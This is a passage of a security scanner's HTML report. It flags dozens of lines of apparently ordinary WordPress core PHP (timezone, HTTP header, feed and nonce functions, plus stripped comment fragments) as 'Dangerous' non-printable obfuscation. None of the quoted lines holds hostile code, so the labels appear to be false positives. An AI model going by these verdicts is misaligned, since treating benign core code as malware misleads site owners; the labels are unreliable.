</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 124</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_timezone_string</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1275</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'removable_query_args'</span><span style="color: #007700">, </span><span style="color: #0000BB">$removable_query_args </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1285</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array </span><span style="color: #0000BB">Sanitized $input_array</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1287</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_magic_quotes</span><span style="color: #007700">( </span><span style="color: #0000BB">$input_array </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 128</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$timezone_string</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1296</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$input_array</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1307</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">false HTTP content</span><span style="color: #007700">. </span><span style="color: #0000BB">False on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1309</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_remote_fopen</span><span style="color: #007700">( </span><span style="color: #0000BB">$uri </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1325</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">wp_remote_retrieve_body</span><span style="color: #007700">( </span><span style="color: #0000BB">$response </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1339</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp</span><span style="color: #007700">( </span><span style="color: #0000BB">$query_vars </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1361</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Status description </span><span style="color: #007700">if </span><span style="color: #0000BB">found</span><span style="color: #007700">, </span><span style="color: #0000BB">an </span><span style="color: #007700">empty </span><span style="color: #0000BB">string otherwise</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1363</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_status_header_desc</span><span style="color: #007700">( </span><span style="color: #0000BB">$code </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 140</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$tz_offset</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1439</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$wp_header_to_desc</span><span style="color: #007700">[ </span><span style="color: #0000BB">$code </span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1457</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">status_header</span><span style="color: #007700">( </span><span style="color: #0000BB">$code</span><span style="color: #007700">, </span><span style="color: #0000BB">$description </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1468</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'apply_filters' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1500</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array </span><span style="color: #0000BB">The associative </span><span style="color: #007700">array </span><span style="color: #0000BB">of header names </span><span style="color: #007700">and </span><span style="color: #0000BB">field values</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1502</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_get_nocache_headers</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 150</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">DateTimeZone Timezone object</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1523</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$headers</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 152</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_timezone</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1537</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">nocache_headers</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 153</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return new </span><span style="color: #0000BB">DateTimeZone</span><span style="color: #007700">( </span><span style="color: #0000BB">wp_timezone_string</span><span style="color: #007700">() );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1558</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">cache_javascript_headers</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1573</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">int Number of database queries</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1575</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_num_queries</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1577</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$wpdb</span><span style="color: #007700">-></span><span style="color: #0000BB">num_queries</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1588</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool True </span><span style="color: #007700">if </span><span style="color: #DD0000">'y'</span><span style="color: #007700">, </span><span style="color: #0000BB">false on anything </span><span style="color: #007700">else.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1590</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bool_from_yn</span><span style="color: #007700">( </span><span style="color: #0000BB">$yn </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1591</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return ( </span><span style="color: #DD0000">'y' </span><span style="color: #007700">=== </span><span style="color: #0000BB">strtolower</span><span style="color: #007700">( </span><span style="color: #0000BB">$yn </span><span style="color: #007700">) );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1597</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">will </span><span style="color: #007700">die </span><span style="color: #0000BB">with a</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1606</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">do_feed</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1650</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">do_feed_rdf</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1661</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">do_feed_rss</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1674</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">do_feed_rss2</span><span style="color: #007700">( </span><span style="color: #0000BB">$for_comments </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1691</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">do_feed_atom</span><span style="color: #007700">( </span><span style="color: #0000BB">$for_comments </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1707</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">do_robots</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1741</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">do_favicon</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1770</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool Whether the site is already installed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_blog_installed</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 177</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The date</span><span style="color: #007700">, </span><span style="color: #0000BB">translated </span><span style="color: #007700">if </span><span style="color: #0000BB">locale specifies it</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 179</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">date_i18n</span><span style="color: #007700">( </span><span style="color: #0000BB">$format</span><span style="color: #007700">, </span><span style="color: #0000BB">$timestamp_with_offset </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">$gmt </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1805</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true </span><span style="color: #007700">and </span><span style="color: #0000BB">let it take over</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1865</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Escaped URL with nonce action added</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1867</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_nonce_url</span><span style="color: #007700">( </span><span style="color: #0000BB">$actionurl</span><span style="color: #007700">, </span><span style="color: #0000BB">$action </span><span style="color: #007700">= -</span><span style="color: #0000BB">1</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">'_wpnonce' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1869</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">esc_html</span><span style="color: #007700">( </span><span style="color: #0000BB">add_query_arg</span><span style="color: #007700">( </span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">wp_create_nonce</span><span style="color: #007700">( </span><span style="color: #0000BB">$action </span><span style="color: #007700">), </span><span style="color: #0000BB">$actionurl </span><span style="color: #007700">) );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1882</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">without any parameters</span><span style="color: #007700">, </span><span style="color: #0000BB">because validation of the nonce</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1895</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">hidden form field</span><span style="color: #007700">. Default </span><span style="color: #0000BB">true</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1896</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Nonce field HTML markup</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1898</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_nonce_field</span><span style="color: #007700">( </span><span style="color: #0000BB">$action </span><span style="color: #007700">= -</span><span style="color: #0000BB">1</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">'_wpnonce'</span><span style="color: #007700">, </span><span style="color: #0000BB">$referer </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">, </span><span style="color: #0000BB">$display </span><span style="color: #007700">= </span><span style="color: #0000BB">true </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 189</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned timestamp is also with offset</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 190</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">should never be used to produce a timestamp</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1910</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$nonce_field</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1921</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">the referer field</span><span style="color: #007700">. Default </span><span style="color: #0000BB">true</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1922</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Referer field HTML markup</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1924</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_referer_field</span><span style="color: #007700">( </span><span style="color: #0000BB">$display </span><span style="color: #007700">= </span><span style="color: #0000BB">true </span><span style="color: #007700">) {</span>
</span>
